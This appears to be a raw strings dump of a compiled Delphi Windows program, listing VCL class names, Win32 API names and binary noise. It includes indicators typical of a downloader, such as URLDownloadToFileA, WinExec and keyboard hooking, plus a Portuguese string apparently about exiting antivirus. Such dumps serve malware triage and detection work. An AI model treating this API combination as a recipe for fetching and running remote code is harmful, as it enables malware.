MonitorFromWindow
MousePos
MouseZ
MoveFileA
MoveToEx
MSH_SCROLL_LINES_MSG
MSH_WHEELSUPPORT_MSG
MS Sans Serif
msshell
MSWHEEL_ROLLMSG
MS_WINHELP
MulDiv
MultiByteToWideChar
MultiMon
muv-Eqt
nComCtrls
	NewHeight
	NewTarget
NewWidth
NoToAll
n;wVv;
ObjectMenuItem
odComboBoxEdit
odDisabled	odChecked	odFocused	odDefault
odGrayed
odHotLight
odInactive	odNoAccel
odNoFocusRect
odReserved1
odReserved2
odSelected
OEM_CHARSET
OemToCharA
OffsetRect
OldCreateOrder
OldCreateOrder4_C
oleaut32.dll
OleStr
OnActivatep
OnAdvancedDrawItem
OnCanResizel
OnChange
OnChangel
OnClick
OnClick\
OnClose
OnClosel
OnCloseQuery
OnConstrainedResizel
OnContextPopupl
OnCreatel
OnDblClickl
OnDeactivate4
	OnDestroyl
OnDockDrop
OnDockOverx
OnDragDrop
OnDragOver
OnDrawItem \C
	OnEndDock
OnGetSiteInfol
OnHelph
OnHide 
	OnKeyDown
OnKeyPressh
OnKeyUp
OnMeasureItem
OnMouseDown
OnMouseMove
	OnMouseUpp
OnMouseWheel
OnMouseWheelDown
OnMouseWheelUpl
OnPaintl
OnPopup
OnResize
OnShortCutl
OnShow
OnShowSV
OnStartDock,
OnTimerSV
OnUnDock
OpenThemeData
	OwnerDraw
paCenter
paLeft
ParentBiDiMode
ParentBiDiMode<
ParentBiDiMode\[C
ParentColor<
ParentFont
paRight
PatBlt
PeekMessageA
\perftemp.dll
Pitch<
PixelsPerInch
pmBlack
pmCopy	pmNotCopy
pmMaskNotPen
pmMaskPenNot
pmMask	pmNotMask
pmMerge
pmMergeNotPen
pmMergePenNot
pmNotMerge
pmNotXor
pmWhite
poDefaultPosOnly
poDefaultSizeOnly
poDesigned	poDefault
poDesktopCenter
poMainFormCenter
poNone
poOwnerFormCenter
poPrintToFit
poProportional
	PopupMenu
poScreenCenter
Position
Position<
PostMessageA
PostQuitMessage
P.reloc
Printers
PrintScale
process
P.rsrc
psClear
psDash
psDashDotDot
psDot	psDashDot
psInsideFrame
psSolid
P?:S?u
PtInRect
Q<]_^[
QQQQQQQS
QQQQQQSVW3
QQQQQSVW
QQQQSV
QQQQSVW
QTypInfo
'{Q{\X(;E
R0_^[]
R0]_^[
R0Z_^[
	RadioItemT
RaiseException
R ;C0|
R,;C4}!
.rdata
ReadFile
RealizePalette
Rebuild
RectVisible
RedrawWindow
RegCloseKey
RegisterAutomation
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegStr
ReleaseCapture
ReleaseDC
RemoveMenu
RemovePropA
ResetEvent
Resize
RestoreDC
RHelpIntfs
RichEdit
"RTLConsts
RtlUnwind
Runtime error     at 00000000
RUSSIAN_CHARSET
S`]_^[
S,_^[]
S$_^[]
S	_^[]
S0_^[]
;s0t=;
S8_^[]
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SaveDC
Sb#+l6
Scaled
ScreenSnap
ScreenToClient
ScrollWindow
SdZ]_^[
Selected
SelectObject
SelectPalette
Sender
SendMessageA
SetActiveWindow
SetBkColor
SetBkMode
SetBrushOrgEx
SetCapture
SetClassLongA
SetCursor
SetDIBColorTable
SetEndOfFile
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetLayeredWindowAttributes
SetMenu
SetMenuItemInfoA
SetParent
SetPixel
SetPropA
SetRect
SetROP2
SetScrollInfo
SetScrollPos
SetScrollRange
SetStretchBltMode
SetTextColor
SetThemeAppProperties
SetThreadLocale
SetTimer
SetViewportOrgEx
SetWindowLongA
SetWindowOrgEx
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
SetWindowTheme
*ShellAPI
SHIFTJIS_CHARSET
(ShlObj
s'hLQB
ShortCut
ShortCutText
ShortInt
ShowCursor
ShowHint<
ShowOwnedPopups
ShowScrollBar
ShowWindow
Single
SizeofResource
Smallint
Smooth<
SnapBufferP
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
Source
Source	TMenuItem
%s (%s)
ssCtrl
ssDouble
ssFlat
ssHotTrack
ssLeft
ssMiddle
	ssRegular
ssRight
ssShift
s(;~ t8
StdActns
StretchBlt
String
Strings
Style<
SubMenuImages
SVh`5B
sx;P`u
S$_^[Y]
SYMBOL_CHARSET
SyncObjs
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
SystemParametersInfoA
SysUtils
<*t"<0r=<9w9i
t9;wlt4
TActionLinkSV
TAdvancedMenuDrawItemEvent
TAlign
TAnchorKind
TAnchors
TApplication
TApplicationt
Target
TaskbarCreated
TBaseDragControlObject
TBaseDragControlObjectd
TBasicAction
TBasicActionLink
TBasicActionP A
	TBiDiMode
TBitmap
TBitmapCanvas
TBitmapCanvasp
TBitmapImage
TBitmapP
tbLeftButton
TBorderIcon
TBorderIcons
TBorderWidth
tbRightButton
TBrush
TBrushStyle
t$;C8u
TCanResizeEvent
TCanvas
TCaption
TChangeLinkDDC
TClassFinder
TCloseAction
TCloseEvent
TCloseQueryEvent
TColor
TCommonDialog
TCommonDialog,DB
TComponent
TComponentNameH
TComponentp
TConstrainedResizeEvent
TConstraintSize
TContainedAction
TContainedAction<oB
TContextPopupEvent
TControl
TControlActionLink
TControlCanvas
TControlScrollBar
TControlScrollBar0
TConversion
TConversionFormat
TCriticalSection
TCursor
TCustomAction
TCustomActionList
TCustomActionList`pB
TCustomActionXrB
TCustomControl
TCustomControl@
TCustomDockForm
TCustomDockForml
TCustomForm
TCustomImageList
TCustomMemoryStreamH
TCustomVariantType
TCustomVariantTypet
TDefaultMonitor
TDockDropEvent
TDockOverEvent
	TDockTree
	TDockZone
TDragControlObject
TDragControlObjectEx
TDragDockObject
TDragDockObjectD
TDragDockObjectEx
TDragDropEvent
	TDragKind
	TDragMode
TDragObject
TDragOverEvent
TDragState
t#;^dt
TEndDragEvent
	TErrorRec
TExceptRec
TextHeight
TFiler
TFileStream
TFontCharset
TFonth
	TFontName
TFontPitch
TFontStyle
TFontStyles
TForm1
TFormBorderStyle
TFormStyle
TGetSiteInfoEvent
TGraphic
TGraphic,
TGraphicsObject
THAI_CHARSET
THandleStream
THelpContext
THelpEvent
THelpManager
	THelpType
THelpViewerNode
Theme manager 
THintAction
	THintInfo@
THintWindow
This program must be run under Win32
t@h\P@
t%HtIHtm
	ThumbSize
TIconImage
TIdentMapEntry
TImageIndex
TImeName
	TIntConst
TInterfacedObject
TInterfacedPersistent<
TInterfacedPersistentx
t%Jt?Jt[
	TKeyEvent
TKeyPressEvent
TlsGetValue
TlsSetValue
@tlsW0
	TMainMenu
TMemoryStream
TMenuActionLink
TMenuAnimation
TMenuAnimations
TMenuAutoFlag
TMenuBreak
TMenu,cC
TMenuChangeEvent
TMenuDrawItemEvent
	TMenuItem
	TMenuItem8_C
TMenuItemAutoFlag
TMenuItemStack
TMenuMeasureItemEvent
TMonitor
TMouse
TMouseButton
TMouseEvent
TMouseMoveEvent
TMouseWheelEvent
TMouseWheelUpDownEvent
$TMultiReadExclusiveWriteSynchronizer
TNotifyEvent
TObject
TObject	
TObjectList
ToolWin
TOrderedList
TOwnerDrawState
TPatternManagerSV
TPenMode
	TPenStyle
TPersistent
TPersistentL
TPoint
TPopupAlignment
TPopupList
TPopupMenu
	TPosition
TPrintScale
TPropFixup
TPropIntfFixup
TPUtilWindow
TrackButton\[C
Tracking
TrackPopupMenu
TranslateMDISysAccel
TranslateMessage
TransparentColor
TransparentColorValue
TReader
	TRegGroup
TRegGroups
TResourceManager
TResourceStream
tr;s@u
TScreen
TScrollBarInc
TScrollBarStyle
TScrollingWinControl
TSharedImage
TShiftState
	TShortCut
TShortCutEvent
TShortCutList
TShortCutList<qB
	TSiteList
TSizeConstraints
TStack
TStartDockEvent
TStream
TStreamAdapter
TStringItem
TStringList
TStringListX
TStrings
TStrings(
TSynchroObject
TThemeServices
TThreadList
TThreadLocalCounter
TTimer
TTrackButton
TUnDockEvent
TURKISH_CHARSET
tVSVWU
TWinControl
TWinControlActionLink
TWinControld
TWindowState
TWinHelpViewer
TWMKey
u*;~8u
UCwF]\
uhuhuhuhuhu saindo do av
UnhandledExceptionFilter
UnhookWindowsHookEx
UninitializeFlatSB
Unknown
UnrealizeObject
UnregisterClassA
UP1EZmw
}]up{2
UpdateWindow
URLDownloadToFileA
UrlMon
URLMON.DLL
UseDockManagerx
USER32
user32.dll
User32.dll
USER32.DLL
UTypes
u$;~|u
uxtheme.dll
^/.v8a
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
$VarUtils
VarXor
vcltest3.dll
VerQueryValueA
version.dll
VertScrollBar
VertScrollBar\
VHl$kN
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Visible
Visible<
Visiblel
vMenus
V[P>Ofl
WaitForSingleObject
WaitMessage
WheelDelta
+WH+W@
WideCharToMultiByte
Width<
Width8
WindowFromPoint
WindowMenul
Windows
WindowState4_C
WinExec
WinHelpA
WinHelpViewer
?WinInet
WINNLSEnableIME
winrom
WndProcPtr%.8X%.8X
WriteFile
wsMaximized
wsMinimized
wsNormal
WWinSpool
;X0t@S
XD;PHu
]}XnUB"d'm]
XPTPSW
Xxi P D
YesToAll
YStrUtils
y];XMo
_^[YY]
Y_^[Y]
$YZ]_^[
YZ]_^[
YZXtm1
(Z]_^[
$Z]_^[
ZTUWVSPRTj